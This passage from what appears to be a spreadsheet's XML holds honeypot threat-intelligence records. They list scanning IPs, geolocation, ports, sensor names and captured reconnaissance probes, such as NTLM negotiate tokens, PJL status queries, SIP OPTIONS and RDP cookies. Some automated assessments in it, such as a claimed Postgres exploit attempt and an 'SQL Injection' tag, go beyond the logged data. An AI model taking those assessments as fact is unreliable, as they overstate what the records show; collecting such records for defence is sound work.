    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;55904&amp;&amp;1433&amp;&amp;23&amp;&amp;161&amp;&amp;54375&amp;&amp;NA</t>
  </si>
  <si>
    <t>JO</t>
  </si>
  <si>
    <t>Jordan</t>
  </si>
  <si>
    <t>AM</t>
  </si>
  <si>
    <t>Amman</t>
  </si>
  <si>
    <t>250441</t>
  </si>
  <si>
    <t>31.9544</t>
  </si>
  <si>
    <t>35.9106</t>
  </si>
  <si>
    <t>8376</t>
  </si>
  <si>
    <t>Jordan Data Communications Company LLC</t>
  </si>
  <si>
    <t>Jordan Telecom Group</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,54001)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,54107)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,54520)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,56623)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,65241)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,65372)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,52377)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,52416)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,60366)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,60432)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,65446)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,49985)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,52246)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,52714)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,61358)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,61442)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,54289)}&amp;&amp;{Data_SMB:Incoming connection (94.249.68.50,55501)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:5ef9:4432</t>
  </si>
  <si>
    <t>3439dd10f5425b9ca250a93fc1c9bae9</t>
  </si>
  <si>
    <t>101.36.114.222</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_MSSQL_H41&amp;&amp;SMA-LAB_SMTP_H10&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_MYSQL_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21819&amp;&amp;3306&amp;&amp;443&amp;&amp;80&amp;&amp;25&amp;&amp;1433&amp;&amp;1080&amp;&amp;1521&amp;&amp;45629&amp;&amp;3389&amp;&amp;33244&amp;&amp;110&amp;&amp;6379&amp;&amp;55000&amp;&amp;NA&amp;&amp;5900&amp;&amp;54158&amp;&amp;123&amp;&amp;5432&amp;&amp;445</t>
  </si>
  <si>
    <t>1835848</t>
  </si>
  <si>
    <t>37.5665</t>
  </si>
  <si>
    <t>126.978</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;NA&amp;&amp;command&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'TLRMTVNTUAABAAAAB4IIOAAAAAAAAAAAAAAAAAAAAAA=', 'data': 'None'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POP3:{'args': 'NTLM', 'cmd': 'AUTH'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_NTP:{'mode': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (101.36.114.222,44912)}&amp;&amp;{Data_SMB:Incoming connection (101.36.114.222,53312)}&amp;&amp;{Data_SMB:Incoming connection (101.36.114.222,56044)}</t>
  </si>
  <si>
    <t>::ffff:6524:72de</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze activity.</t>
  </si>
  <si>
    <t>8d8c343f51a57f33264a06d54f762ef9</t>
  </si>
  <si>
    <t>154.212.141.146</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Email Impersonation</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_POP3_H27&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_SIP_H44&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_FTP_H18&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_FTP_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;64017&amp;&amp;445&amp;&amp;143&amp;&amp;5432&amp;&amp;3306&amp;&amp;3389&amp;&amp;25&amp;&amp;110&amp;&amp;NA&amp;&amp;443&amp;&amp;1433&amp;&amp;21&amp;&amp;9100&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;GET&amp;&amp;command&amp;&amp;login&amp;&amp;NA&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.234.67.80:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.37.11:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '156.244.37.11:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.146,54464)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.146,44038)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.146,45892)}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.74.222.213:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '185.74.222.213:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.60.171.39:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.146.12.172:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.209.6:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.60.209.6:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.79.122:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.146,56308)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (HCyYWzUY,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.115.66:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.60.209.6:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.146;rport=57387'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.211.202.140:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8d92</t>
  </si>
  <si>
    <t>Possible attempt to exploit Postgres database vulnerability by sending POST request, which could lead to unauthorized access or data theft. The lack of response suggests the attacker might be probing for vulnerabilities. This may indicate reconnaissance activity by an attacker. &amp;&amp; There is insufficient information to analyze, as there is no log data provided. &amp;&amp; Someone is attempting to access a service on an IP address with a suspicious port number, possibly for reconnaissance or testing purposes. This activity could be the start of a larger malicious attack. The target appears to be a web server. &amp;&amp; Potential malicious activity detected - unauthorized connection to a server, likely an attempt to access a web service without permission.
The request is for the root directory of the website, which could be a scouting mission to identify vulnerabilities.
This activity may indicate reconnaissance or probing to map out server infrastructure.</t>
  </si>
  <si>
    <t>SQL Injection &amp;&amp; Port Scan &amp;&amp; Brute Scan</t>
  </si>
  <si>
    <t>8858d7330f41d946a0e021ae28f1b006</t>
  </si>
  <si>
    <t>59.184.20.188</t>
  </si>
  <si>
    <t>::ffff:3bb8:14bc</t>
  </si>
  <si>
    <t>f037a1eb83968fe8799a7724ebd65b5d</t>
  </si>
  <si>
    <t>154.212.141.151</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_SMTP_H19&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IMAP_H39&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_MYSQL_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;110&amp;&amp;3306&amp;&amp;25&amp;&amp;1433&amp;&amp;445&amp;&amp;9100&amp;&amp;21&amp;&amp;389&amp;&amp;5432&amp;&amp;NA&amp;&amp;143&amp;&amp;23</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;login&amp;&amp;command&amp;&amp;request&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.4.48.242:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.118.77:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (XjPuaHZn,)}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.151;rport=49383'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.151;rport=39650'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.74.222.213:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '154.93.37.45:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.151,57338)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (chyODXyX,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 66.94.127.183:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '149.102.153.168:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.8.69:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '156.244.8.69:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8d97</t>
  </si>
  <si>
    <t>e462ffb56353183399f0760dd334cc98</t>
  </si>
  <si>
    <t>117.194.27.3</t>
  </si>
  <si>
    <t>::ffff:75c2:1b03</t>
  </si>
  <si>
    <t>045bbf04c8053602833f19b5af3e2456</t>
  </si>
  <si>
    <t>205.210.31.184</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_POSTGRES_H2&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_NTP_H21&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_SNMP_H10&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SOCKS5_H14&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_PJL_H7&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_NTP_H9&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MYSQL_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;18939&amp;&amp;143&amp;&amp;3389&amp;&amp;1433&amp;&amp;445&amp;&amp;5432&amp;&amp;9100&amp;&amp;161&amp;&amp;NA&amp;&amp;1521&amp;&amp;50833&amp;&amp;50893&amp;&amp;5900&amp;&amp;443&amp;&amp;48957&amp;&amp;53152&amp;&amp;49664&amp;&amp;1080&amp;&amp;110&amp;&amp;53565&amp;&amp;6379&amp;&amp;60954&amp;&amp;3306&amp;&amp;6667&amp;&amp;50347&amp;&amp;52781&amp;&amp;80&amp;&amp;389&amp;&amp;21&amp;&amp;49204&amp;&amp;54088&amp;&amp;55333&amp;&amp;49395&amp;&amp;52734&amp;&amp;54607&amp;&amp;56184</t>
  </si>
  <si>
    <t>connection&amp;&amp;request&amp;&amp;command&amp;&amp;NA&amp;&amp;stshash&amp;&amp;GET&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,61432)}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uotyZLjJS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BdKdjb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UfoZKZ'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NouNFdxKT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fPyWdC'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SpXsAy'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,60086)}&amp;&amp;{Data_SMB:Incoming connection 